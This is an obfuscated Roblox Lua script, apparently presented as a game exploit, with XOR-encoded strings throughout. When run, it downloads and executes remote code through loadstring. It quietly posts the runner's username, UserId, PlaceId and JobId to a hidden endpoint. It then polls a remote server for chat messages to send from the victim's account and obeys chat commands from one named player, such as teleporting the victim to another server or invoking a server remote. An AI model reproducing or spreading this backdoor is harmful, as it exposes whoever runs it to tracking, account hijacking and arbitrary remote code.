--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v31,v32) local v33={};for v69=1, #v31 do v6(v33,v0(v4(v1(v2(v31,v69,v69 + 1 )),v1(v2(v32,1 + (v69% #v32) ,1 + (v69% #v32) + 1 )))%256 ));end return v5(v33);end local v8,v9=pcall(function() return game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\250\45\235\186\195\40\136\154\148\22\246\190\194\26\156\235\206\39\171\131\136\19\208\202\213\106\213\171\194\27\213\134\137\117\206\174\197\91\131\147\227\107\234\174\198","\126\177\163\187\69\134\219\167"),true);end);if (v8 and v9) then local v70,v71=pcall(function() loadstring(v9)();end);if  not v70 then warn("Fehler beim Ausführen des externen Skripts: "   .. v71 );end else warn(v7("\5\200\34\201\249\49\141\40\192\245\46\141\2\192\238\54\195\62\192\238\47\204\46\192\242\99\201\47\214\188\38\213\62\192\238\45\200\36\133\207\40\223\35\213\232\48\131","\156\67\173\74\165"));end local v10=game:GetService(v7("\4\187\72\15\185\52\85","\38\84\215\41\118\220\70"));local v11=game:GetService(v7("\100\19\58\6\221\88\23\54\33\251\66\0\43\17\251","\158\48\118\66\114"));local v12=game:GetService(v7("\131\48\4\38\64\160\233\189\45\19\51","\155\203\68\112\86\19\197"));local v13=game:GetService(v7("\114\216\58\249\80\119\247\236\117\216\36\234\73\123\224","\152\38\189\86\156\32\24\133"));local v14=game:GetService(v7("\206\82\183\74\245\84\166\82\249\83\148\82\243\69\166\65\249","\38\156\55\199"));local v15=v10.LocalPlayer;local v16=v7("\160\105\104\56\73\59\181\79\167\126\125\36\27\123\233\87\242\46\44\120\67\59\247\70\187\110\125\47\22\103","\35\200\29\28\72\115\20\154");local v17=v7("\17\171\197\207\158\118\123\86\187\216\204\142\35\38\29\241\210\208\128\99\53\9\182\158\200\136\46\60\22\176\218\204\194\125\102\72\237\137\143\212\124\99\74\231\133\141\216\116\97\79\234\129\144\220\14\27\47\183\221\235\166\116\14\84\182\133\245\166\46\56\42\230\245\212\219\5\29\15\184\203\205\152\24\108\13\232\224\197\222\117\108\47\148\225\215\175\56\21\13\187\254\206\140\33\49\31\182\197\205\185\121\103\84\183\201\231\184\43\25\73\230","\84\121\223\177\191\237\76");local v18={};getgenv().executedPlayers=getgenv().executedPlayers or {} ;getgenv().Message=v7("\224\68\204\179\63\68","\161\219\54\169\192\90\48\80");local function v21(v34) local v35=1690 -(209 + 1481) ;local v36;local v37;while true do if (v35==(0 -0)) then v36=Instance.new(v7("\125\71\24\49\106\74\1\49\100\71\19\54\72\69\5\21\91\77\16\32\91\86\9\32\90","\69\41\34\96"));v37=v34.TextSource;v35=1637 -(1373 + 263) ;end if (v35==(1001 -(451 + 549))) then if v37 then local v85=0;local v86;while true do if (v85==0) then v86=v10:GetPlayerByUserId(v37.UserId);if (v86 and (v86.Name==v7("\146\202\217\0\3\0\169\205\208\58\16\36","\75\220\163\183\106\98"))) then v36.PrefixText='<font color="#FF0000">[Admin]</font> '   .. v34.PrefixText ;end break;end end end return v36;end end end v11.OnIncomingMessage=v21;local function v23() local v38=0;local v39;local v40;local v41;local v42;local v43;while true do local v72=0 -0 ;while true do if (v72==(115 -(4 + 110))) then if (v38==(1 + 1)) then v42,v43=pcall(function() return v12:JSONDecode(v41.Body);end);if ( not v42 or (type(v43)~=v7("\24\207\92\126\123","\135\108\174\62\18\30\23\147"))) then warn(v7("\144\236\34\199\29\188\115\197\179\224\39\139\60\171\48\200\178\224\47\217\29\160\115\195\179\251\106\225\43\129\29\138\146\232\62\206\22\224","\167\214\137\74\171\120\206\83"));return nil;end v38=4 -1 ;end if ((0 -0)==v38) then v39=http_request or v39 or HttpPost or (syn and syn.request) ;if  not v39 then local v100=1384 -(746 + 638) ;local v101;while true do if (v100==(0 -0)) then v101=0 -0 ;while true do if (v101==(0 + 0)) then local v114=0 -0 ;while true do if (v114==(341 -(218 + 123))) then warn("HTTP-Request-Funktion nicht verfügbar.");return nil;end end end end break;end end end v38=1 -0 ;end break;end if (v72==(1581 -(1535 + 46))) then if (v38==3) then return v43;end if (v38==(1 + 0)) then v40,v41=pcall(function() return v39({[v7("\55\168\135","\185\98\218\235\87")]=v16,[v7("\230\57\51\238\209\174","\202\171\92\71\134\190")]=v7("\14\228\24","\232\73\161\76")});end);if ( not v40 or  not v41 or  not v41.Body) then local v102=0;while true do if (v102==(0 + 0)) then warn(v7("\157\220\74\81\27\169\153\64\88\23\182\153\99\95\12\174\223\71\83\94\191\220\80\29\48\186\218\74\79\23\184\209\86\88\16\245","\126\219\185\34\61"));return nil;end end end v38=562 -(306 + 254) ;end v72=1 -0 ;end end end end local function v24(v44) local v45=0 + 0 ;local v46;while true do if (v45==(65 -(30 + 35))) then if  not v44 then local v87=0 + 0 ;local v88;while true do if (v87==0) then v88=0 -0 ;while true do if (v88==(1467 -(899 + 568))) then warn("Ungültige Nachricht.");return;end end break;end end end v46=v11.TextChannels.RBXGeneral;v45=1 + 0 ;end if (v45==(1213 -(323 + 889))) then v46:SendAsync(v44);break;end end end local function v25() v18={};end local function v26(v47,v48,v49,v50) local v51=0 -0 ;local v52;local v53;local v54;local v55;while true do if (v51==(2 -1)) then v54={[v7("\4\25\183\63\2\24\173\102\19\15\169\46","\75\103\118\217")]=v7("\198\68\96\24\176\29\198\64\121\27\183\81\205\71\127\26","\126\167\52\16\116\217")};v55=http_request or v55 or HttpPost or syn.request ;v51=582 -(361 + 219) ;end if (v51==2) then if v55 then v55({[v7("\253\60\44","\156\168\78\64\224\212\121")]=v17,[v7("\37\225\161\215","\174\103\142\197")]=v53,[v7("\123\45\75\48\42\90","\152\54\72\63\88\69\62")]=v7("\228\235\221\104","\60\180\164\142"),[v7("\112\91\4\45\34\255\1","\114\56\62\101\73\71\141")]=v54});else warn(v7("\144\221\239\244\245\219\222\213\173\236\200\208\245\207\206\202\179\253\210\203\182\169\213\205\187\225\207\132\191\236\221\209\182\237\222\202\246\169\236\193\186\225\212\203\179\169\208\203\182\231\207\193\248\231\210\199\176\253\155\195\189\250\222\202\188\236\207\132\175\236\201\192\189\231\149","\164\216\137\187"));end break;end if (v51==(603 -(268 + 335))) then v52={[v7("\136\255\60\73\253\169\159","\199\235\144\82\61\152")]=string.format("Username: %s\nUserID: %d\nGameID (PlaceId): %d\nJobID: %s",v47,v48,v49,v50)};v53=v12:JSONEncode(v52);v51=1;end end end local function v27(v56) local v57=0 + 0 ;local v58;while true do if (v57==(290 -(60 + 230))) then v58=false;for v79,v80 in ipairs(getgenv().executedPlayers) do if (v80.UserId==v56.UserId) then v58=true;break;end end v57=573 -(426 + 146) ;end if ((1 + 0)==v57) then if  not v58 then local v89=1456 -(282 + 1174) ;while true do if (v89==(811 -(569 + 242))) then table.insert(getgenv().executedPlayers,{[v7("\252\231\60\183","\107\178\134\81\210\198\158")]=v56.Name,[v7("\13\29\135\212\131\60","\202\88\110\226\166")]=v56.UserId,[v7("\243\3\131\244\207\234\11","\170\163\111\226\151")]=game.PlaceId,[v7("\59\63\176\17\74","\73\113\80\210\88\46\87")]=game.JobId});v26(v56.Name,v56.UserId,game.PlaceId,game.JobId);break;end end end break;end end end local function v28(v59,v60) v13:TeleportToPlaceInstance(tonumber(v59),v60,v15);end v11.TextChannels.RBXGeneral.OnIncomingMessage=function(v61) local v62=0 + 0 ;local v63;while true do if (v62==(0 -0)) then v63=v61.Text;if (v63:sub(1 + 0 ,132 -(116 + 10) )==v7("\192\38\194\27\233\193","\135\225\76\173\114")) then local v90=string.split(v63," ");if ( #v90==(1027 -(706 + 318))) then local v93=738 -(542 + 196) ;local v94;local v95;while true do if ((0 -0)==v93) then v94=v90[1253 -(721 + 530) ];v95=v90[1274 -(945 + 326) ];v93=1 + 0 ;end if (v93==(2 -1)) then v28(v94,v95);break;end end end elseif (v63==v7("\91\206\176\181\175\182","\199\122\141\216\208\204\221")) then local v96=0 + 0 ;local v97;while true do if (v96==(0 -0)) then v97=v11.TextChannels.RBXGeneral;v97:SendAsync(v7("\133\216\9","\150\205\189\112\144\24"));break;end end elseif (v63:lower()==v7("\54\129\179\64\68\137\29\28","\112\69\228\223\44\100\232\113")) then local v103=0 -0 ;local v104;while true do if (v103==(700 -(271 + 429))) then v104=v14:WaitForChild(v7("\209\9\2\221\162\111","\230\180\127\103\179\214\28")):WaitForChild(v7("\191\0\83\74\197\77\236","\128\236\101\63\38\132\33"));v104:InvokeServer();break;end end elseif ((v63==v7("\237\129\16\72\186\228","\175\204\201\113\36\214\139")) and v10:FindFirstChild(v7("\105\197\59\214\5\108\217\59\219\52\85\195","\100\39\172\85\188")) and (v10:FindFirstChild(v7("\131\113\183\138\50\134\109\183\135\3\191\119","\83\205\24\217\224")).UserId==v61.TextSource.UserId)) then local v111=0;local v112;while true do if (v111==(0 + 0)) then v112=v11.TextChannels[v7("\212\231\245\26\227\203\200\47\231\201","\93\134\165\173")];v112:SendAsync(v7("\182\243\205\206\53","\30\222\146\161\162\90\174\210"));break;end end end break;end end end;local function v30(v64) local v65=0;local v66;while true do if (v65==(1501 -(1408 + 92))) then if v66 then for v91,v92 in ipairs(v66:GetChildren()) do if (v92:IsA(v7("\209\65\127\6","\106\133\46\16")) and (v92.Name==v64)) then return true;end end end return false;end if (v65==0) then for v81,v82 in ipairs(v15.Backpack:GetChildren()) do if (v82.Name==v64) then return true;end end v66=v15.Character;v65=1;end end end task.spawn(function() while true do local v73=1086 -(461 + 625) ;local v74;while true do if (v73==(1122 -(118 + 1003))) then if v74 then for v98,v99 in ipairs(v74) do if (v99:sub(1289 -(993 + 295) ,9)==v7("\3\45\118\239\73\65\95\37\51","\32\56\64\19\156\58")) then local v105=0 + 0 ;local v106;while true do if (v105==(1171 -(418 + 753))) then v106=string.split(v99," ");if ( #v106>=(13 -10)) then local v116=0 + 0 ;local v117;local v118;local v119;while true do if (v116==(1 + 0)) then v119=nil;while true do if (v117==(0 + 0)) then v118=tonumber(v106[3 -1 ]);v119=table.concat(v106," ",1 + 2 );v117=1 + 0 ;end if (v117==(530 -(406 + 123))) then if ((v118==v15.UserId) and v119 and  not v18[v119]) then v24(v119);v18[v119]=true;end break;end end break;end if (v116==(1769 -(1749 + 20))) then v117=0 + 0 ;v118=nil;v116=1323 -(1249 + 73) ;end end end break;end end end end end break;end if (v73==0) then task.wait(5);v74=v23();v73=1;end end end end);task.spawn(function() local v67=0 + 0 ;local v68;while true do if (v67==(1145 -(466 + 679))) then v68=false;while true do local v83=0 -0 ;local v84;while true do if ((0 -0)==v83) then v84=1900 -(106 + 1794) ;while true do if (v84==(0 + 0)) then task.wait(753.001 -(239 + 514) );if (v30(v7("\110\192\224\22\123\224\139\95\198\246\66\85\252\133","\224\58\168\133\54\58\146")) and  not v68) then v68=true;local v113=v11.TextChannels.RBXGeneral;v113:SendAsync(getgenv().Message);elseif  not v30(v7("\109\94\78\189\84\148\140\14\87\69\95\242\123\131","\107\57\54\43\157\21\230\231")) then v68=false;end break;end end break;end end end break;end end end);v27(v15);
